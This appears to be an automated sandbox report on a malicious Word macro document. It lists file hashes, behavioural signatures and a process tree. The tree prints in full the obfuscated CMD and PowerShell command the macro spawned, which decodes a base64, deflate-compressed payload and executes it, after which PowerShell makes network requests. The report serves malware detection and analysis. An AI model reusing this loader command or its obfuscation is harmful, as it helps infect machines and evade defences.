Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-09-2024 21:32
Behavioral task
behavioral1
Sample
e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc
-
Size
78KB
-
MD5
e36605b4d8b6e37b33ef0228bee7c764
-
SHA1
36aa582a3a4d540d1c1335fd5cc9a37af8d65010
-
SHA256
788f2664d8d90cc23b7b0f987112fdd80c54de4ba9566a5714392b7fe0208fe9
-
SHA512
5cd157b31e7fab60f52f8b23bcfff37b2715a2c0916f6b76c732c094b8e040b5bf92b423e3c98e0086062711fb82dd61d03378aea181947c76379bb78f88dc1d
-
SSDEEP
768:Q/ZVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9KTwiRZ1u2O7VQnoH:EZocn1kp59gxBK85fBt+a9KNRvi
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 3004 1732 CMD.exe WINWORD.EXE -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 7 2312 powershell.exe 9 2312 powershell.exe 11 2312 powershell.exe 13 2312 powershell.exe 15 2312 powershell.exe 16 2312 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXECMD.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1732 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2312 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1732 WINWORD.EXE 1732 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXECMD.exedescription pid process target process PID 1732 wrote to memory of 3060 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 3060 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 3060 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 3060 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 3004 1732 WINWORD.EXE CMD.exe PID 1732 wrote to memory of 3004 1732 WINWORD.EXE CMD.exe PID 1732 wrote to memory of 3004 1732 WINWORD.EXE CMD.exe PID 1732 wrote to memory of 3004 1732 WINWORD.EXE CMD.exe PID 3004 wrote to memory of 2312 3004 CMD.exe powershell.exe PID 3004 wrote to memory of 2312 3004 CMD.exe powershell.exe PID 3004 wrote to memory of 2312 3004 CMD.exe powershell.exe PID 3004 wrote to memory of 2312 3004 CMD.exe powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3060
-
C:\Windows\SysWOW64\CMD.exeCMD C:\WINDowS\systEm32\CMD.exE /C "set kidZ= . ( $sHellid[1]+$SHELlID[13]+'X')(new-oBject sySTEM.IO.comPRESSiON.deFLatesTreaM( [IO.MeMOrYStReAM][CONVERT]::fRoMbASE64stRINg('NZBBawIxEIX/yh4CUazJzWrDgqViEVEPFraFXrJxiqnZSZqdNWvF/95V6vV9bz6Yx5azTY6Qhr78BkPZGkgUUL44C0iKbdfPOd8ThScpbWiM07XxzqKuhfGVHLej7bxNj9P/Sh2aGKKv/I2WE/hYFKs7TCmJGkwE0tFqaAmwth5FgyRg1wgdZQpD47EDJMvl/Y7AuRPp3UELBJJJb/Tb7PdOwflK1I08crENzlKPT3lfsR8sszzjo/GEK/b6XuQM8PhEUIUB/+SDKx9wAS1w9eUjaLPvsaJZZRaz69P9M8XTmXXjiJlP6Lzeza2DW+chuwr7aoFHf4DhopPeElV2noO6GE1mf75c/gA='), [syStEM.io.cOmprEsSIoN.compRESsiONMODe]::dECOMpREsS ) ^|% {new-oBject iO.STrEamREADEr($_,[sYStEM.TexT.eNCoDinG]::AsCII)}).ReaDTOENd( ) && powErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )"2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5c555b8f0042d9b6a880e56e54508ece0
SHA1d49077620311b19f005309908761b06cc6c366ab
SHA256a62219932049d8df16e7ef03a4d33bb03b9be910ff2eef9ac71dd2e0ad93ae14
SHA512026eb8d409cc6f0e02453c08d9ca144fc74831230f75daa73f4538cabd8c52d939c829c45276e5950bb385d3f0758edbfbdaeb813c330c157a2accf032e29df0